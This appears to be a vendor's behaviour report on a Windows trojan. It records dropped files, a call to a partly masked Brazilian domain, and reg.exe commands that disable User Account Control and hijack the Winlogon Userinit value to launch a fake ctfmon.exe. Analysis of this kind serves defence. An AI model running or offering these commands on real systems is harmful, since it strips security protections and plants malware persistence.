Technical information
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Userinit' = '<SYSTEM32>\userinit.exe,C:\DOCUME~1\%USERNAME%\LOCALS~1\Temp\ctfmon.exe,'
- User Account Control (UAC)
- %TEMP%\~1.bat
- <LS_APPDATA>\term.764
- <LS_APPDATA>\term.786
- <LS_APPDATA>\term.xp
- %TEMP%\26429tmp.vbs
- %TEMP%\~1.bat
- %TEMP%\26429tmp.vbs
- 'localhost':1038
- 'ad#.####sbrasiltotal.com.br':80
- http://ad#.####sbrasiltotal.com.br/sal.php?a=###################
- DNS ASK www.go###e.com.br
- DNS ASK ad#.####sbrasiltotal.com.br
- ClassName: '' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c %TEMP%\~1.bat <Full path to file>
- '<SYSTEM32>\ping.exe' www.go###e.com.br -n 1 -l 1
- '<SYSTEM32>\find.exe' "TTL"
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' "http://ad#.####sbrasiltotal.com.br/sal.php?a=#####################"
- '<SYSTEM32>\fsutil.exe' file createnew "%TEMP%\thunb.db" 666"
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "<SYSTEM32>\userinit.exe,%HOMEPATH%\LOCALS~1\Temp\ctfmon.exe," /f